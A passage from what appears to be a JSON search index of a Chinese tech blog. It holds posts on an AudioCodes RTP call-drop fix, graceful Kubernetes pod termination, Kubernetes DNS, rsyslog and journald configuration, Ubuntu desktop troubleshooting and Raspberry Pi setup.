c = Object.create(null) console.log(a,b,c) 上面三个对象的区别是什么?","title":"{} Object.create({}) Object.create(null)的区别?"},{"content":"通话10多秒后,fs对两个call leg发送bye消息。\nBye消息给的原因是 
Reason: Q.850 ;cause=31 ;text=”local, RTP Broken Connection”\n在通话的前10多秒,SIP信令正常,双方也能听到对方的声音。\n首先排查了下fs日志,没发现什么异常。然后根据这个报错内容,在网上搜了下。\n发现了这篇文章 https://www.wavecoreit.com/blog/serverconfig/call-drop-transfer-rtp-broken-connection/\n这篇文章给出的解决办法是通过配置奥科AudioCodes网关来解决的。\n然后咨询了下客户,证实他们用的也是奥科网关。所以就参考教程,配置了一下。\n主要是在两个地方进行配置\nClick Setup -\u0026gt; Signaling\u0026amp;Media -\u0026gt; Expand Coders \u0026amp; Profiles -\u0026gt; Click IP Profiles -\u0026gt; Edit your SFB Profile -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply\nExpand SIP Definitions -\u0026gt; Click SIP Definitions General Settings -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply -\u0026gt; Click Save\n这两个地方,都是配置Broken Connection Mode,选择ignore来设置的。\n关于RTP的connection mode,有时间再研究下。\n","permalink":"https://wdd.js.org/opensips/ch7/rtp-broken-connection/","summary":"通话10多秒后,fs对两个call leg发送bye消息。\nBye消息给的原因是 Reason: Q.850 ;cause=31 ;text=”local, RTP Broken Connection”\n在通话的前10多秒,SIP信令正常,双方也能听到对方的声音。\n首先排查了下fs日志,没发现什么异常。然后根据这个报错内容,在网上搜了下。\n发现了这篇文章 https://www.wavecoreit.com/blog/serverconfig/call-drop-transfer-rtp-broken-connection/\n这篇文章给出的解决办法是通过配置奥科AudioCodes网关来解决的。\n然后咨询了下客户,证实他们用的也是奥科网关。所以就参考教程,配置了一下。\n主要是在两个地方进行配置\nClick Setup -\u0026gt; Signaling\u0026amp;Media -\u0026gt; Expand Coders \u0026amp; Profiles -\u0026gt; Click IP Profiles -\u0026gt; Edit your SFB Profile -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply\nExpand SIP Definitions -\u0026gt; Click SIP Definitions General Settings -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply -\u0026gt; Click Save\n这两个地方,都是配置Broken Connection Mode,选择ignore来设置的。\n关于RTP的connection mode,有时间再研究下。","title":"奥科网关 Rtp Broken Connection"},{"content":"原文:https://cloud.google.com/blog/products/gcp/kubernetes-best-practices-terminating-with-grace\nEditor’s note: Today is the fifth installment in a seven-part video and blog series from Google Developer Advocate Sandeep Dinesh on how to get the most out of your Kubernetes environment.\nWhen it comes to distributed systems, handling failure is key. Kubernetes helps with this by utilizing controllers that can watch the state of your system and restart services that have stopped performing. On the other hand, Kubernetes can often forcibly terminate your application as part of the normal operation of the system.\nIn this episode of “Kubernetes Best Practices,” let’s take a look at how you can help Kubernetes do its job more efficiently and reduce the downtime your applications experience.\nIn the pre-container world, most applications ran on VMs or physical machines. If an application crashed, it took quite a while to boot up a replacement. 
If you only had one or two machines to run the application, this kind of time-to-recovery was unacceptable.\nInstead, it became common to use process-level monitoring to restart applications when they crashed. If the application crashed, the monitoring process could capture the exit code and instantly restart the application.\nWith the advent of systems like Kubernetes, process monitoring systems are no longer necessary, as Kubernetes handles restarting crashed applications itself. Kubernetes uses an event loop to make sure that resources such as containers and nodes are healthy. This means you no longer need to manually run these monitoring processes. If a resource fails a health check, Kubernetes automatically spins up a replacement.\nThe Kubernetes termination lifecycle Kubernetes does a lot more than monitor your application for crashes. It can create more copies of your application to run on multiple machines, update your application, and even run multiple versions of your application at the same time! This means there are many reasons why Kubernetes might terminate a perfectly healthy container. If you update your deployment with a rolling update, Kubernetes slowly terminates old pods while spinning up new ones. If you drain a node, Kubernetes terminates all pods on that node. If a node runs out of resources, Kubernetes terminates pods to free those resources (check out this previous post to learn more about resources).\nIt’s important that your application handle termination gracefully so that there is minimal impact on the end user and the time-to-recovery is as fast as possible!\nIn practice, this means your application needs to handle the SIGTERM message and begin shutting down when it receives it. This means saving all data that needs to be saved, closing down network connections, finishing any work that is left, and other similar tasks.\nOnce Kubernetes has decided to terminate your pod, a series of events takes place. 
Let’s look at each step of the Kubernetes termination lifecycle.\n1 - Pod is set to the “Terminating” State and removed from the endpoints list of all Services At this point, the pod stops getting new traffic. Containers running in the pod will not be affected. 2 - preStop Hook is executed The preStop Hook is a special command or http request that is sent to the containers in the pod. If your application doesn’t gracefully shut down when receiving a SIGTERM you can use this hook to trigger a graceful shutdown. Most programs gracefully shut down when receiving a SIGTERM, but if you are using third-party code or are managing a system you don’t have control over, the preStop hook is a great way to trigger a graceful shutdown without modifying the application.\n3 - SIGTERM signal is sent to the pod At this point, Kubernetes will send a SIGTERM signal to the containers in the pod. This signal lets the containers know that they are going to be shut down soon. Your code should listen for this event and start shutting down cleanly at this point. This may include stopping any long-lived connections (like a database connection or WebSocket stream), saving the current state, or anything like that.\nEven if you are using the preStop hook, it is important that you test what happens to your application if you send it a SIGTERM signal, so you are not surprised in production!\n4 - Kubernetes waits for a grace period At this point, Kubernetes waits for a specified time called the termination grace period. By default, this is 30 seconds. It’s important to note that this happens in parallel to the preStop hook and the SIGTERM signal. Kubernetes does not wait for the preStop hook to finish. If your app finishes shutting down and exits before the terminationGracePeriod is done, Kubernetes moves to the next step immediately.\nIf your pod usually takes longer than 30 seconds to shut down, make sure you increase the grace period. 
You can do that by setting the terminationGracePeriodSeconds option in the Pod YAML. For example, to change it to 60 seconds:\n5 - SIGKILL signal is sent to pod, and the pod is removed If the containers are still running after the grace period, they are sent the SIGKILL signal and forcibly removed. At this point, all Kubernetes objects are cleaned up as well.\nConclusion Kubernetes can terminate pods for a variety of reasons, and making sure your application handles these terminations gracefully is core to creating a stable system and providing a great user experience.\nkubectl explain deployment.spec.template.spec.terminationGracePeriodSeconds KIND: Deployment VERSION: apps/v1 FIELD: terminationGracePeriodSeconds \u0026lt;integer\u0026gt; DESCRIPTION: Optional duration in seconds the pod needs to terminate gracefully. May be decreased in delete request. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period will be used instead. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. Defaults to 30 seconds. 1. 参考 https://stackoverflow.com/questions/35453792/pods-stuck-in-terminating-status ","permalink":"https://wdd.js.org/container/terminating-with-grace/","summary":"原文:https://cloud.google.com/blog/products/gcp/kubernetes-best-practices-terminating-with-grace\nEditor’s note: Today is the fifth installment in a seven-part video and blog series from Google Developer Advocate Sandeep Dinesh on how to get the most out of your Kubernetes environment.\nWhen it comes to distributed systems, handling failure is key. Kubernetes helps with this by utilizing controllers that can watch the state of your system and restart services that have stopped performing. 
On the other hand, Kubernetes can often forcibly terminate your application as part of the normal operation of the system.","title":"优雅停止的pod"},{"content":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolve.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如何下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolve.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.kube-system.svc.cluster.local.\nbash-5.0# nslookup 10.254.10.20 20.10.254.10.in-addr.arpa\tname = kube-dns.kube-system.svc.cluster.local. 而实际上,这个IP地址就是kube-dns的地址。\n[root@kube-m ~]# kubectl get service -n kube-system -o wide NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR kube-dns ClusterIP 10.254.10.20 \u0026lt;none\u0026gt; 53/UDP,53/TCP 15d k8s-app=kube-dns 而k8s-app=kube-dns这个label可以选中coredns\n[root@kube-m ~]# kubectl get pod -l k8s-app=kube-dns -nkube-system NAME READY STATUS RESTARTS AGE coredns-79f9c855c5-nrk88 1/1 Running 0 15d coredns-79f9c855c5-x75rq 1/1 Running 0 5h45m ","permalink":"https://wdd.js.org/container/k8s-network/","summary":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. 
pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolve.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如何下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolve.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.kube-system.svc.cluster.local.\nbash-5.0# nslookup 10.254.10.20 20.10.254.10.in-addr.arpa\tname = kube-dns.","title":"K8s pod node网络"},{"content":" 1. 序言 日志文件包含系统的运行信息,包括内核、服务、应用程序等的日志。日志在分析系统故障、排查应用问题等方面,有着至关重要的作用。\n2. 哪些进程负责管理日志? 默认情况下,系统上有两个守护进程服务管理日志。journald和rsyslogd。\njournald是systemd的一个组件,journald的负责收集日志,日志可以来自\nSyslog日志 内核日志 初始化内存日志 启动日志 所有服务写到标准输出和标准错误的日志 journal收集并整理收到的日志,使其易于被使用。\n有以下几点需要注意\n默认情况下,journal的日志是不会持久化的。 journal的日志是二进制的格式,并不能使用文本查看工具,例如cat, 或者vim去分析。journal的日志需要用journalctl命令去读取。 journald会把日志写到一个socket中,rsyslog可以通过这个socket来获取日志,然后去写文件。\n3. 日志文件文件位置 日志文件位置 /var/log/ 目录 4. 日志配置文件位置 /etc/rsyslog.conf rsyslogd配置文件 /etc/logrotate.conf 日志回滚的相关配置 /etc/systemd/journald.conf journald的配置文件 5. rsyslog.conf 5.1. 模块加载 注意 imjournal就是用来负责访问journal中的日志 imuxsock 提供本地日志输入支持,例如使用logger命令输入日志 $ModLoad imuxsock # provides support for local system logging (e.g. via logger command) $ModLoad imjournal # provides access to the systemd journal 5.2. 过滤 5.2.1. 优先级过滤 **模式:FACILITY.**PRIORITY\n设备(FACILITY): kern (0), user (1), mail (2), daemon (3), auth (4), syslog (5), lpr (6), news (7), cron (8), authpriv (9), ftp (10), and local0 through local7 (16 - 23). 
日志等级:debug (7), info (6), notice (5), warning (4), err (3), crit (2), alert (1), and emerg (0). 匹配符 = 指定某个级别 ! 排除某个级别 * 匹配所有级别 Example: kern.* #选择所有的内核信息 mail.crit #选择所有优先级高于等于crit cron.!info # 选择cron日志不是info级别的日志 5.2.2. 属性过滤 模式::PROPERTY, [!]COMPARE_OPERATION, \u0026ldquo;STRING\u0026rdquo; **\n比较操作符(COMPARE_OPERATION) contains 包含 isequal 相等 startswith 以xxx开头 regex 正则匹配 ** 举个比较常见的例子.\n如果日志中包含 wdd 这个字符串,就把日志写到/var/log/wdd.log 这个文件里。\n首先编辑一下/etc/rsyslog.conf 文件\n注意 :msg 表示消息的内容 详情可以参考 man rsyslog.conf 关于Available Properties的部分内容\n:msg,contains,\u0026#34;wdd\u0026#34; /var/log/wdd.log 保存退出,然后执行下面的命令:\ntouch /var/log/wdd.log # 创建文件 systemctl restart rsyslog # 重启服务 logger hello wdd ➜ log tail /var/log/wdd.log May 23 19:26:52 VM_0_8_centos root: hello wdd 5.2.3. Action 将rsyslog写日志文件:\n# 方式1:过滤器 日志路径 cron.* /var/log/cron.log # 方式2:过滤器\t-日志路径。注意多了个- # 默认rsyslog是同步写日志,加个-表示异步写日志。在写日志比较多时候,异步的写可以提高性能 mail.* -/var/log/cron.log # 方式3:通过网络发送日志 # @[(zNUMBER)]HOST:[PORT] zNUMBER是压缩等级 mail.* @192.168.2.3:8000 #通过UDP发送日志 cron.* @@192.168.2.3:8000 #通过TCP发送日志, 注意多了一个@ *.* @(2)192.168.2.3:8000 #通过UDP发送日志,日志会被压缩后发送,压缩等级是2。日志如果少于60字节,将不会压缩 5.2.4. 丢弃日志 cron.* stop *.* ~ # rsyslog8 支持用~丢弃日志 详情可以:man rsyslog.conf\n5.2.5. 日志回滚 man logrotate 里面有很多示例\n/var/log/wdd.log { noolddir size 10M rotate 10 sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 6. 速度限制 6.1. journald的速度限制 RateLimitInterval 限速周期,默认30s RateLimitBurst 限速值, 默认限速值1000 针对单个service, 在一个限速周期内,如果消息量超过限速值,则丢弃本周期内的所有消息。\n/etc/systemd/journald.conf\n#RateLimitInterval=30s #RateLimitBurst=1000 如果想关闭速度限制,就将RateLimitInterval设置为0\nRateLimitInterval=, RateLimitBurst= Configures the rate limiting that is applied to all messages generated on the system. 
If, in the time interval defined by RateLimitInterval=, more messages than specified in RateLimitBurst= are logged by a service, all further messages within the interval are dropped until the interval is over. A message about the number of dropped messages is generated. This rate limiting is applied per-service, so that two services which log do not interfere with each other\u0026rsquo;s limits. Defaults to 1000 messages in 30s. The time specification for RateLimitInterval= may be specified in the following units: \u0026ldquo;s\u0026rdquo;, \u0026ldquo;min\u0026rdquo;, \u0026ldquo;h\u0026rdquo;, \u0026ldquo;ms\u0026rdquo;, \u0026ldquo;us\u0026rdquo;. To turn off any kind of rate\nlimiting, set either value to 0.\n6.2. rsyslog的速度限制 /etc/rsyslog.conf\n$SystemLogRateLimitInterval 2 # 单位是s $SystemLogRateLimitBurst 50 如果要关闭速度限制,就将SystemLogRateLimitInterval设置为0\n7. journal 日志清理 \u0026ndash;vacuum-size=, \u0026ndash;vacuum-time= Removes archived journal files until the disk space they use falls below the specified size (specified with the usual \u0026ldquo;K\u0026rdquo;, \u0026ldquo;M\u0026rdquo;, \u0026ldquo;G\u0026rdquo;, \u0026ldquo;T\u0026rdquo;\nsuffixes), or all journal files contain no data older than the specified timespan (specified with the usual \u0026ldquo;s\u0026rdquo;, \u0026ldquo;min\u0026rdquo;, \u0026ldquo;h\u0026rdquo;, \u0026ldquo;days\u0026rdquo;,\n\u0026ldquo;months\u0026rdquo;, \u0026ldquo;weeks\u0026rdquo;, \u0026ldquo;years\u0026rdquo; suffixes). Note that running \u0026ndash;vacuum-size= has only indirect effect on the output shown by \u0026ndash;disk-usage as\nthe latter includes active journal files, while the former only operates on archived journal files. \u0026ndash;vacuum-size= and \u0026ndash;vacuum-time=\nmay be combined in a single invocation to enforce both a size and time limit on the archived journal files.\n发现 /var/log/journal的目录居然有4G。\n所以需要清理。\n7.1. 
手动清理 journalctl --vacuum-time=2d # 保留最近两天 journalctl --vacuum-size=500M # 保留最近500MB 按天执行一次试试:\njournalctl --vacuum-time=2d Vacuuming done, freed 3.9G of archived journals on disk. 7.2. 修改配置 为了避免以后还需要手动清理,可以修改/etc/systemd/journal.conf文件\n例如将最大使用改为200M\nSystemMaxUse=200M 重启journald: systemctl restart systemd-journald 8. linux 日志文件简介 inux的日志位于/var/log目录下。\n日志主要分为4类\n1 应用日志 2 事件日志 3 服务日志 4 系统日志 日志内容\n/var/log/messages 普通应用级别活动 /var/log/auth.log 用户验证相关事件 /var/log/secure 系统授权 /var/log/boot.log 系统启动日志 /var/log/dmesg.log 硬件设备相关 /var/log/kern.log 内核日志 /var/log/faillog 失败的登录尝试日志 /var/log/cron crontab计划任务日志 /var/log/yum.log 包安装日志 /var/log/maillog /var/log/mail.log 邮件服务相关日志 /var/log/httpd/ Apache web服务器日志 /var/log/mysql.log /var/log/mysqld.log mysql相关日志 ","permalink":"https://wdd.js.org/posts/2022/10/linux-journal/","summary":"1. 序言 日志文件包含系统的运行信息,包括内核、服务、应用程序等的日志。日志在分析系统故障、排查应用问题等方面,有着至关重要的作用。\n2. 哪些进程负责管理日志? 默认情况下,系统上有两个守护进程服务管理日志。journald和rsyslogd。\njournald是systemd的一个组件,journald的负责收集日志,日志可以来自\nSyslog日志 内核日志 初始化内存日志 启动日志 所有服务写到标准输出和标准错误的日志 journal收集并整理收到的日志,使其易于被使用。\n有以下几点需要注意\n默认情况下,journal的日志是不会持久化的。 journal的日志是二进制的格式,并不能使用文本查看工具,例如cat, 或者vim去分析。journal的日志需要用journalctl命令去读取。 journald会把日志写到一个socket中,rsyslog可以通过这个socket来获取日志,然后去写文件。\n3. 日志文件文件位置 日志文件位置 /var/log/ 目录 4. 日志配置文件位置 /etc/rsyslog.conf rsyslogd配置文件 /etc/logrotate.conf 日志回滚的相关配置 /etc/systemd/journald.conf journald的配置文件 5. rsyslog.conf 5.1. 模块加载 注意 imjournal就是用来负责访问journal中的日志 imuxsock 提供本地日志输入支持,例如使用logger命令输入日志 $ModLoad imuxsock # provides support for local system logging (e.g. via logger command) $ModLoad imjournal # provides access to the systemd journal 5.2. 过滤 5.2.1. 优先级过滤 **模式:FACILITY.**PRIORITY\n设备(FACILITY): kern (0), user (1), mail (2), daemon (3), auth (4), syslog (5), lpr (6), news (7), cron (8), authpriv (9), ftp (10), and local0 through local7 (16 - 23).","title":"Linux 日志系统简述"},{"content":"1. 
ubuntu wine 微信中文乱码 修改文件 /opt/deepinwine/tools/run.sh /opt/deepinwine/tools/run_v2.sh 将WINE_CMD那行中加入LC_ALL=zh_CN.UTF-8\nWINE_CMD=\u0026#34;LC_ALL=zh_CN.UTF-8 deepin-wine\u0026#34; 参考 https://gitee.com/wszqkzqk/deepin-wine-for-ubuntu\n2. ubuntu 20.04 wine 微信 qq 截图时黑屏 之前截图都是好的的,不知道为什么,今天截图时,点击了微信的截图按钮后,屏幕除了状态栏,都变成黑色的了。\n各种搜索引擎搜了一遍,没有发现解决方案。\n最后决定思考最近对系统做了什么变更,最近我好像给系统安装了新的主题,然后在登录时,选择了新的主题,而没有选择默认的ubuntu主题。\n在登录界面的右下角,有个按钮,点击之后,可以选择主题。\n最近我都是选择其他的主题,没有选择默认的ubuntu主题,然后我就注销之后,重新在登录时选择默认的ubuntu主题后,再次打开微信截图,功能恢复正常。\n所以说,既然选择ubuntu了,就没必要搞些花里胡哨的东西。ubuntu默认的主题挺好看的,而且支持自带主题的设置,就没必要再折腾了。\n3. [open] ubuntu 20.04 锁屏后 解锁屏幕非常慢 super + l可以用来锁屏,锁屏之后屏幕变成黑屏。\n黑屏之后,如果需要唤醒屏幕,可以随便在键盘上按键,去唤醒屏幕。但是这个唤醒的过程感觉很慢,基本上要随便按键接近十几秒,屏幕才能被点亮,网上搜了下,但是没有找到原因。\n但是有个解决办法,就是在黑屏状态下,不要随便输入,而要输入正确的密码,然后按回车键, 这样会快很多。\n也就是说,系统运行正常,可能是显示器的问题。\n4. ubuntu 20.04 xorg 高cpu 桌面卡死 sudo systemctl restart gdm 5. ubuntu 状态栏显示网速 sudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor sudo apt-get install indicator-sysmonitor 在任务启动中选择System Monitor\n在配置中可以选择开机启动\n在高级中可以设置显示哪些列, 我只关系网速,所以只写了{net}\n6. 在命令行查看图片 实际上终端并不能显示图片,而是调用了外部的程序取显示图片。\neog 是 Eye Of Gnome 的缩写, 它其实是个图片查看器。\neog output.png 7. build-requirements: libtool not found. apt-get update apt-get install -y libtool-bin 8. ubuntu下解压zip文件出现中文乱码 相信大家在使用Ubuntu等linux系统时经常会遇到解压压缩文件出现乱码。 zip的处理方式主要有以下两种\n一、unzip 解压时-O指定字符编码\nunzip -O GBK xxxx.zip 注:解压很复杂的中文名文件称如果报错,用引号括起来即可\n二、unar\nunar xxx.zip 注:这种方式要先保证系统中有安装unar,若没有使用如下命令安装: sudo apt-get install unar\n9. 放弃ubuntu的GUI 选择linux的原因无非是丰富的开发软件包,各种个样的效率工具,而不是因为漂亮的GUI。\n我使用ubuntu大概已经有有几个月了,说说一些使用体会。\n聊天软件: 微信、QQ等工,目前只有wine版,使用体验会稍微比mac和window有些差,但是基本是可用。 输入法:搜狗输入法,基本上和win和mac没有什么差别 文档: wps 基本上和win和mac没有区别 浏览器: chrome, firefox体验始终丝滑 编辑器:neovim 畅享丝滑 各种开发工具:git, docker, oh my zsh tmux 等等, 这些天然就是linux下面的工具 总体来说,如果没有最近遇到的两个严重问题,我会一直用ubuntu下开发的。\nxorg经常cpu很高,导致界面卡死,出现频率很高,查了很多资料,依然无法解决。只能通过restart gdm3去重启。 有时候xorg cpu不算高,也查不出高cpu的进程,但是整个界面还是卡死 卡死的这个问题真的非常影响开发效率。\n所以我决定关闭ubuntu的图形界面,通过ssh链远程接,在上面做开发\n10. 
ubuntu 终端还是图形界面 ubuntu boot最后阶段,进入到登录提示。\n这里有两个选择\n图形界面 tty终端 具体是进入哪种显示方式,是由配置决定。但是默认的是图形界面。\n# 终端启动 systemctl set-default multi-user.target # 图形界面启动 systemctl set-default graphical.target 设置之后reboot 11. 如何从GUI进入到终端模式呢? 某些时候,ubuntu图形界面卡死,无法交互。如何进入终端模式使用top命令看看什么在占用CPU呢?\n有以下快捷键可以从GUI切换到tty\nCtrl + alt + f1 Ctrl + alt + f2 Ctrl + alt + f3 Ctrl + alt + f4 Ctrl + alt + f5 Ctrl + alt + f6 上面的快捷键都可以进入终端,如果一个不行,就用另一个试试。注意 ctrl alt f功能键 要同时按下去。\n我之前就遇到过,图形界面卡死,无法操作。然后进入终端模式,使用top命令,看到xorg占用了接近100%的CPU.\n然后输入下面的命令来重启gdm来解决的\nsudo systemctl restart gdm 12. 什么是GDM? GDM是gnome display manager的缩写。\n# 查看gonme版本号 gnome-shell --version 常见的gdm有\ngdm3 lightdm ssdm 通过查看/etc/X11/default-display-manager可以查看系统使用的gdm具体是哪个\n➜ ~ cat /etc/X11/default-display-manager /usr/sbin/gdm3 也可以通过下面的方式查看 systemctl status display-manager # 可以通过下面的方式安装不同的gdm sudo apt install lightdm sudo apt install sddm # 通过dpkg-reconfigure 可以来配置使用不同的GDM sudo dpkg-reconfigure gdm3 sudo dpkg-reconfigure lightdm sudo dpkg-reconfigure sddm 13. ubuntu截图软件flameshot apt install flameshot 14. 生命不息 折腾不止 使用ubuntu作为主力开发工具 最初,我花了6年时间在windows上学习、娱乐、编码\n后来我花了4年时间转切换到macbook pro上开发\n现在,我切换到ubuntu上开发。\n我花了很长的时间,走过了人生的大半个青葱岁月的花样年华\n才学会什么是效率,什么是专一。\n蓦然回首\n这10年的路,每次转变的开始都是感觉镣铐加身,步履维艰,屡次三番想要放弃\n内心深处彷佛有人在说,你为什么要改变呢? 之前的感觉不是很好吗?\n你为什么要这么折腾呢?\n有一种鸟儿注定不会被关在牢笼里,因为它的每一片羽毛都闪耀着自由的光辉。\u0026ndash;《肖申克的救赎》\n改变,的确是让人不舒服的事情。\n说实话,刚开始在ubuntu上开发,连装个中文输入法都让我绝望的想要放弃。\n还好是IT行业,你路过的坑,肯定有前任踩过。\n说来有点搞笑,我在ubuntu上使用vscode时,居然感觉不习惯了。\n我不习惯写着写着代码,还要把手从键盘上移开,去寻找千里之行的鼠标,然后滑动、点击、一直不停歇\n然后我就切换回neovim。\n有人说:vim是跟得上思维速度的编辑器。只有真正使用过的人,才能理解这句话。\n当你每次想向上飞的时候,总会有更大的阻力。\n15. 最后的最后 我用的deepin 如果我只用终端,连上linux做开发,那么我最好的选择是ubuntu或者manjaro 但是我还是避免不了要用微信,腾讯会议等App,我又想用linux, 那最好的选择是deepin 可能是人老了,不想再折腾了\n","permalink":"https://wdd.js.org/posts/2022/10/ubuntu-tips/","summary":"1. 
ubuntu wine 微信中文乱码 修改文件 /opt/deepinwine/tools/run.sh /opt/deepinwine/tools/run_v2.sh 将WINE_CMD那行中加入LC_ALL=zh_CN.UTF-8\nWINE_CMD=\u0026#34;LC_ALL=zh_CN.UTF-8 deepin-wine\u0026#34; 参考 https://gitee.com/wszqkzqk/deepin-wine-for-ubuntu\n2. ubuntu 20.04 wine 微信 qq 截图时黑屏 之前截图都是好的的,不知道为什么,今天截图时,点击了微信的截图按钮后,屏幕除了状态栏,都变成黑色的了。\n各种搜索引擎搜了一遍,没有发现解决方案。\n最后决定思考最近对系统做了什么变更,最近我好像给系统安装了新的主题,然后在登录时,选择了新的主题,而没有选择默认的ubuntu主题。\n在登录界面的右下角,有个按钮,点击之后,可以选择主题。\n最近我都是选择其他的主题,没有选择默认的ubuntu主题,然后我就注销之后,重新在登录时选择默认的ubuntu主题后,再次打开微信截图,功能恢复正常。\n所以说,既然选择ubuntu了,就没必要搞些花里胡哨的东西。ubuntu默认的主题挺好看的,而且支持自带主题的设置,就没必要再折腾了。\n3. [open] ubuntu 20.04 锁屏后 解锁屏幕非常慢 super + l可以用来锁屏,锁屏之后屏幕变成黑屏。\n黑屏之后,如果需要唤醒屏幕,可以随便在键盘上按键,去唤醒屏幕。但是这个唤醒的过程感觉很慢,基本上要随便按键接近十几秒,屏幕才能被点亮,网上搜了下,但是没有找到原因。\n但是有个解决办法,就是在黑屏状态下,不要随便输入,而要输入正确的密码,然后按回车键, 这样会快很多。\n也就是说,系统运行正常,可能是显示器的问题。\n4. ubuntu 20.04 xorg 高cpu 桌面卡死 sudo systemctl restart gdm 5. ubuntu 状态栏显示网速 sudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor sudo apt-get install indicator-sysmonitor 在任务启动中选择System Monitor\n在配置中可以选择开机启动\n在高级中可以设置显示哪些列, 我只关系网速,所以只写了{net}\n6. 在命令行查看图片 实际上终端并不能显示图片,而是调用了外部的程序取显示图片。\neog 是 Eye Of Gnome 的缩写, 它其实是个图片查看器。","title":"Ubuntu 使用过程中遇到的问题以及解决方案"},{"content":"我已经装过几次树莓派的系统了,记录一些使用心得。\n1. 选择哪个版本 最好用无桌面版,无桌面版更加稳定。我之前用过几次桌面版,桌面版存在以下问题。\n使用偶尔感觉会卡 经常使用一天之后,第二天要重启系统。 2. 关于初始设置 默认的用户是 pi,默认的密码是raspberry 登录成功之后,sudo passwd pi 来修改pi用户的密码 登录之后,sudo passwd root 来设置root的用户密码 3. 开启ssh 远程登录服务 raspi-config 4. root用户ssh登录 默认树莓派是禁止使用root远程登录的,想要开启的话,需要编辑/etc/ssh/sshd_config文件,增加一行PermitRootLogin yes, 然后重启ssh服务\nvi /etc/ssh/sshd_config PermitRootLogin yes sudo systemctl restart ssh // chong 5. 关于联网 联网有两个方案\n用网线连接,简单方便,但是有条线子,总会把桌面搞得很乱 使用wifi连接,简单方便 使用wifi连接,一种方式是编辑配置文件,这个比较麻烦。我建议使用树莓派提供的raspi-config命令来设置wifi。\n在命令行中输入:raspi-config, 可以看到如下界面\n按下箭头,选择NetWork Options,按回车确认 进入网络设置后,按下箭头,选择N2 Wi-fi 然后就很简单了,输入wifi名称和wifi密码,最好你的wifi名称是英文的,出现中文会很尴尬的。 6. 
如何找到树莓派的IP地址 某些情况下,树莓派在断电重启之后会获得新的IP地址。在没有显示器的情况下,如何找到树莓派的IP呢?\n树莓派的MAC地址是:b8:27:eb:6c 开头\n所以你只需要输入: arp -a 就会打印网络中的主机以及MAC地址,找以b8:27:eb:6c开头的,很可能就是树莓派。\n7. 设置清华镜像源 https://mirrors.tuna.tsinghua.edu.cn/help/raspbian/\n","permalink":"https://wdd.js.org/posts/2022/10/raspi-config/","summary":"我已经装过几次树莓派的系统了,记录一些使用心得。\n1. 选择哪个版本 最好用无桌面版,无桌面版更加稳定。我之前用过几次桌面版,桌面版存在以下问题。\n使用偶尔感觉会卡 经常使用一天之后,第二天要重启系统。 2. 关于初始设置 默认的用户是 pi,默认的密码是raspberry 登录成功之后,sudo passwd pi 来修改pi用户的密码 登录之后,sudo passwd root 来设置root的用户密码 3. 开启ssh 远程登录服务 raspi-config 4. root用户ssh登录 默认树莓派是禁止使用root远程登录的,想要开启的话,需要编辑/etc/ssh/sshd_config文件,增加一行PermitRootLogin yes, 然后重启ssh服务\nvi /etc/ssh/sshd_config PermitRootLogin yes sudo systemctl restart ssh # 重启ssh服务 5. 关于联网 联网有两个方案\n用网线连接,简单方便,但是有条线子,总会把桌面搞得很乱 使用wifi连接,简单方便 使用wifi连接,一种方式是编辑配置文件,这个比较麻烦。我建议使用树莓派提供的raspi-config命令来设置wifi。\n在命令行中输入:raspi-config, 可以看到如下界面\n按下箭头,选择NetWork Options,按回车确认 进入网络设置后,按下箭头,选择N2 Wi-fi 